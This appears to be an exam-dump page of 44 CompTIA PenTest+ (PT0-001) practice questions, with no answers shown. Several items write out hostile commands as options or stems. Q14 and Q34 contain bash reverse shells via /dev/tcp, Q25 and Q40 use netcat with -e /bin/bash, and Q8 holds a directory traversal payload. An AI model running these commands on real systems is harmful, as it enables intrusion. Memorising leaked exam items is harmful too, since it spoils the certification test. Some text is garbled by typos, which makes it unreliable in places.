CertsTopics Logo

Summer Special Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 60certs

CompTIA PT0-001 Dumps

Page: 1 / 11
Total 294 questions
Get PT0-001 Full Access Download PT0-001 PDF

CompTIA PenTest+ Exam Questions and Answers

Question 1

A penetration tester is asked to scope an external engagement. Which of the following would be a valid target?

Options:

A.

104.45.98.126

B.

169.254. 67.23

C.

172.16.67.145

D.

192.168.47.231

Question 2

A penetration tester reported the following vulnerabilities:

Which of the following is the correct order to rate the vulnerabilities from critical to low considering the MOST immediate impact?

Options:

A.

Unrestricted file upload, stored XSS, SQL injection, verbose server headers

B.

SQL injection, unrestricted file upload, stored XSS, verbose server headers

C.

Verbose server headers, unrestricted file upload, stored XSS, SQL injection

D.

Stored XSS, SQL injection, unrestricted file upload, verbose server headers

Question 3

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

Options:

A.

LSASS

B.

SAM database

C.

Active Directory

D.

Registry

Question 4

A penetration tester identifies prebuilt exploit code containing Windows imports for VirtualAllocEx and LoadLibraryA functions. Which of the following techniques is the exploit code using?

Options:

A.

DLL hijacking

B.

DLL sideloading

C.

DLL injection

D.

DLL function hooking

Question 5

A client has scheduled a wireless penetration test. Which of the following describes the scoping target

information MOST likely needed before testing can begin?

Options:

A.

The physical location and network ESSIDs to be tested

B.

The number of wireless devices owned by the client

C.

The client's preferred wireless access point vendor

D.

The bands and frequencies used by the client's devices

Question 6

Which of the following should a penetration tester verify prior to testing the login and permissions management for a web application that is protected by a CDN-based WAF?

Options:

A.

If an NDA is signed with the CDN company

B.

If the SSL certificates for the web application are valid

C.

If a list of the applicable WAF rules was obtained

D.

If the IP addresses for the penetration tester are whitelisted on the WAF

Question 7

Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).

Options:

A.

To report indicators of compromise

B.

To report findings that cannot be exploited

C.

To report critical findings

D.

To report the latest published exploits

E.

To update payment information

F.

To report a server that becomes unresponsive

G.

To update the statement o( work

Question 8

A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have

helped the penetration tester identify this vulnerability?

Options:

A.

‘or ‘folder’ like ‘file’; ––

B.

|| is /tmp/

C.

“>

D.

&& dir C:/

E.

../../../../../../../../

Question 9

A penetration tester discovers Heartbleed vulnerabilities in a target network Which of the following impacts would be a result of exploiting this vulnerability?

Options:

A.

Code execution can be achieved on the affected systems

B.

Man-in-the-middle attacks can be used to eavesdrop cookie contents.

C.

The attacker can steal session IDs to impersonate other users

D.

Public certificate contents can be used lo decrypt traffic

Question 10

A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?

Options:

A.

DNS cache poisoning

B.

Record and replay

C.

Supervisory server SMB

D.

Blind SQL injection

Question 11

While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

Options:

A.

Letter of engagement and attestation of findings

B.

NDA and MSA

C.

SOW and final report

D.

Risk summary and executive summary

Question 12

A penetration tester observes that several high numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

Options:

A.

Transition the application to another port

B.

Filter port 443 to specific IP addresses

C.

Implement a web application firewall

D.

Disable unneeded services.

Question 13

An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system Which of the following devices if impersonated would be MOST likely to provide the tester with network access?

Options:

A.

Network-attached printer

B.

Power-over-Ethernet injector

C.

User workstation

D.

Wireless router

Question 14

A tester intends to run the following command on a target system:

bash -i >& /dev/tcp/10.2.4.6/443 0> &1

Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

Options:

A.

nc -nlvp 443

B.

nc 10.2.4.6. 443

C.

nc -w3 10.2.4.6 443

D.

nc -e /bin/sh 10.2.4.6. 443

Question 15

A tester identifies an XSS attack vector during a penetration test. Which of the following flags should the tester recommend to prevent a JavaScript payload from accessing the cookie?

Options:

A.

Secure

B.

Domain

C.

Max-Age

D.

HttpOnly

Question 16

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part1: Given the output, construct the command that was used to generate this output from the available options.

Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Part1

Part2

Options:

Question 17

A penetration tester attempts to perform a UDP port scan against a remote target using an Nmap tool installed onto a non-Kali Linux image. For some reason, the UDP scan falls to start. Which of the following would MOST likely help to resolve the issue?

Options:

A.

Install the latest version of the tool.

B.

Review local iptables for existing drop rules.

C.

Relaunch the tool with elevated privileges.

D.

Enable both IPv4 and IPv6 forwarding.

Question 18

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack Which of the following remediation steps should be recommended? (Select THREE)

Options:

A.

Mandate all employees take security awareness training

B.

Implement two-factor authentication for remote access

C.

Install an intrusion prevention system

D.

Increase password complexity requirements

E.

Install a security information event monitoring solution.

F.

Prevent members of the IT department from interactively logging in as administrators

G.

Upgrade the cipher suite used for the VPN solution

Question 19

A company’s corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?

Options:

A.

Company policies must be followed in this situation

B.

Laws supersede corporate policies

C.

Industry standards receding scanning should be followed

D.

The employee must obtain written approval from the company's Chief Information Security Officer (ClSO) prior to scanning

Question 20

A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

Options:

A.

Obsolete software may contain exploitable components

B.

Weak password management practices may be employed

C.

Cryptographically weak protocols may be intercepted

D.

Web server configurations may reveal sensitive information

Question 21

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used m this attack?

Options:

A.

Principle of fear

B.

Principle of authority

C.

Principle of scarcity

D.

Principle of likeness

E.

Principle of social proof

Question 22

Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?

Options:

A.

Stack pointer register

B.

Index pointer register

C.

Stack base pointer

D.

Destination index register

Question 23

A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS

vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

Options:

A.

2.9

B.

3.0

C.

4.0

D.

5.9

Question 24

D18912E1457D5D1DDCBD40AB3BF70D5D

Which of the following is the MOST comprehensive type of penetration test on a network?

Options:

A.

Black box

B.

White box

C.

Gray box

D.

Red team

E.

Architecture review

Question 25

A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?

Options:

A.

perl -e ‘ use SOCKET’; $i=’; $p=’443;

B.

ssh superadmin@ -p 443

C.

nc -e /bin/sh 443

D.

bash -i >& /dev/tcp// 443 0>&1

Question 26

During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?

Options:

A.

Operating system Windows 7

Open ports: 23, 161

B.

Operating system Windows Server 2016

Open ports: 53, 5900

C.

Operating system Windows 8 1

Open ports 445, 3389

D.

Operating system Windows 8

Open ports 514, 3389

Question 27

A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake. Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

Options:

A.

Subject key identifier

B.

Subject alternative name

C.

Authority information access

D.

Service principal name

Question 28

A security assessor completed a comprehensive penetration test of a company and its networks and systems.

During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's

intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor,

although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of

impact?

Options:

A.

Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and

digital signing.

B.

Implement new training to be aware of the risks in accessing the application. This training can be

decommissioned after the vulnerability is patched.

C.

Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the

application to company staff after the vulnerability is patched.

D.

Require payroll users to change the passwords used to authenticate to the application. Following the

patching of the vulnerability, implement another required password change.

Question 29

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.

Which of the following BEST describes the reasoning for this?

Options:

A.

Manufacturers developing IoT devices are less concerned with security.

B.

It is difficult for administrators to implement the same security standards across the board.

C.

IoT systems often lack the hardware power required by more secure solutions.

D.

Regulatory authorities often have lower security requirements for IoT systems.

Question 30

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used

in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

Options:

A.

ICS vendors are slow to implement adequate security controls.

B.

ICS staff are not adequately trained to perform basic duties.

C.

There is a scarcity of replacement equipment for critical devices.

D.

There is a lack of compliance for ICS facilities.

Question 31

A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the

login portal. The tester will leverage multiple proxies to mask the origin IPs of the attack. Which of the following

threat actors will be emulated?

Options:

A.

APT

B.

Hacktivist

C.

Script kiddie

D.

Insider threat

Question 32

While trying to maintain persistence on a Windows system with limited privileges, which of the following

registry keys should the tester use?

Options:

A.

HKEY_CLASSES_ROOT

B.

HKEY_LOCAL_MACHINE

C.

HKEY_CURRENT_USER

D.

HKEY_CURRENT_CONFIG

Question 33

Which of the following is an example of a spear phishing attack?

Options:

A.

Targeting an executive with an SMS attack

B.

Targeting a specific team with an email attack

C.

Targeting random users with a USB key drop

D.

Targeting an organization with a watering hole attack

Question 34

The following line was found in an exploited machine's history file. An attacker ran the following command:

bash -i >& /dev/tcp/192.168.0.1/80 0> &1

Which of the following describes what the command does?

Options:

A.

Performs a port scan.

B.

Grabs the web server's banner.

C.

Redirects a TTY to a remote system.

D.

Removes error logs for the supplied IP.

Question 35

A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?

Options:

A.

To allow another security consultant access to the shell

B.

To allow the developer to troubleshoot the vulnerability

C.

To allow the systems administrator to perform the cleanup

D.

To allow the systems administrator to write a rule on the WAF

Question 36

A constant wants to scan all the TCP Pots on an identified device. Which of the following Nmap switches will complete this task?

Options:

A.

-p-

B.

-p ALX,

C.

-p 1-65534

D.

-port 1-65534

Question 37

A penetration tester is required to exploit a WPS implementation weakness. Which of the following tools will perform the attack?

Options:

A.

Karma

B.

Kismet

C.

Pixie

D.

NetStumbler

Question 38

A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?

Options:

A.

The latest vulnerability scan results

B.

A list of sample application requests

C.

An up-to-date list of possible exploits

D.

A list of sample test accounts

Question 39

A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?

Options:

A.

arPspoof

B.

nmap

C.

responder

D.

burpsuite

Question 40

A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system Which of the following commands should the tester run on the compromised system?

Options:

A.

nc looalhot 4423

B.

nc -nvlp 4423 -« /bin/bash

C.

nc 10.0.0.1 4423

D.

nc 127.0.0.1 4423 -e /bin/bash

Question 41

Which of the following would BEST prevent fence jumping at a facility?

Options:

A.

Install proper lighting around the perimeter of the facility.

B.

Decrease the distance between the links in the fence.

C.

Add a top guard on the fence that faces away from the facility.

D.

Place video cameras that are angled toward the fence.

Question 42

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

Options:

A.

Randomize the credentials used to log in

B.

Install host-based intrusion detection

C.

Implement input normalization

D.

Perform system hardening

Question 43

A penetration tester successfully exploits a system, receiving a reverse shell. Which of the following is a

Meterpreter command that is used to harvest locally stored credentials?

Options:

A.

background

B.

hashdump

C.

session

D.

getuid

E.

psexec

Question 44

A software development team recently migrated to new application software on the on-premises environment Penetration test findings show that multiple vulnerabilities exist If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM Which of the following is MOST important for confirmation?

Options:

A.

Unsecure service and protocol configuration

B.

Running SMB and SMTP service

C.

Weak password complexity and user account

D.

Misconfiguration

Page: 1 / 11
Total 294 questions
Get PT0-001 Full Access Download PT0-001 PDF